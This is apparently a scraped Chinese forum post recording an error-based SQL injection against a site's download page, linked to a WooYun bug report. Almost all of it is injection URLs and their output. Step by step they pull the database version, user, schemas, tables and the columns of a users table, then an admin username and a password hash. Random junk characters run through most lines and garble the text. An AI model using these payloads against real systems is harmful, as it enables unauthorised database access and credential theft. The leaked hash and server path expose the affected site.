http://www.wooyun.org/bugs/wooyun-2010-01666
$ I) C% W+ r7 D: ^! s! d6 V! N5 c2 S7 ~7 Y$ F/ F( R' _) ]
之前想找个测试 没想到这有 可以测试下做个记录而已 5 J# @5 p& M$ y/ F# S
% s& p+ I1 S. ^" F- `http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
3 [) b9 o+ M# E" n
* J. Q. h6 t* D2 U( [. C6 g+ i. _& B, f/data0/htdocs/leqi_new/app/myapp.php
) q. G5 t9 B8 z2 R
1 F8 @0 Z% b5 `. G; w 或者: d, q9 ]0 I7 R s0 o
" x1 v; I. P! l6 \" g! Y/**********version()**********/ 5.1.49-log: _1 d0 Q6 e, M7 V, F
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- Y3 p) r# H: \1 ^. O' W
% t$ G- {9 ~# o( P8 V' E/ J8 G# P2 O/**********user()**********/
# g4 l* J. Y; b0 B$ ^& S' ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 x% o5 L% l+ l% A# U$ t9 P
& y) R% }9 D( q/**********database()**********/ leqi+ o( D; o0 ]+ i8 {9 J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
+ k5 @ A; j0 ~* d/ @- w. U
- ?/ Q' n+ s" T! F. R% P/**********limit依次递归爆库**********/
' L, e5 _8 f$ Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) T% q# a) R. O% E" N- X
information_schema
( ], E9 ]1 P8 ^* `# K( ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% M" w3 @5 Y2 f. s" ]
leqi
^5 R' ^* q4 Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003$ L/ `* c1 I. [5 s& i/ _( F# R; p
test' _5 F: w: T. E6 E- D9 \& l3 ^( L
4 F! m! V* N9 n3 I/**********limit依次递归爆表名**********/
) a6 A- ]) o# phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) o. F/ @4 z8 f3 y' u/ w$ h' Y. q4 uusers
: F0 t" O! R* |& E0 q4 F7 Z; E7 r# w
c2 T7 ^/ v g+ ~% C _/**********limit依次递归爆字段名**********/, L# X+ P7 i- o8 Q6 }0 z- U; ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003' D+ j. _, K, P
user_id,username,nickname,passwd,group_id
. R- P+ X2 h* h0 S# r) @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
# r- U3 ?; l/ A/wapc/5000_0005_0033 k$ w' h* Y/ s+ V3 H
11 216 S- z8 [. j: D6 e3 D0 l2 ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%235 m3 x, g, g/ p
/wapc/5000_0005_003
) f4 d# A+ a. l+ W5 }5 l( t7 @11 341 351 3610 d5 l- J _$ U: K. C
/**********爆数据**********/
# v1 T t$ w% U% y: G, V) o- @5 Mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23# h* C8 r2 i6 D; e |3 N
admin- R7 L" M! P( b+ z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% _) A7 }/ x, ]" q0 A6a8b4574ca231eb8bd52764d4978ffcd0 `9 ]* |1 i, g8 T# `
! Q! r8 G! X0 O
. B+ z+ @# ~! A8 O/ L0 E |